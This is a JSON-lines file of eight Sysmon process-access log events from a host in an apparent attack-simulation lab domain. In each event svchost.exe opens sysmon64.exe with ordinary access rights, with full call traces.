{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1511,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1512,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1513,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1514,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
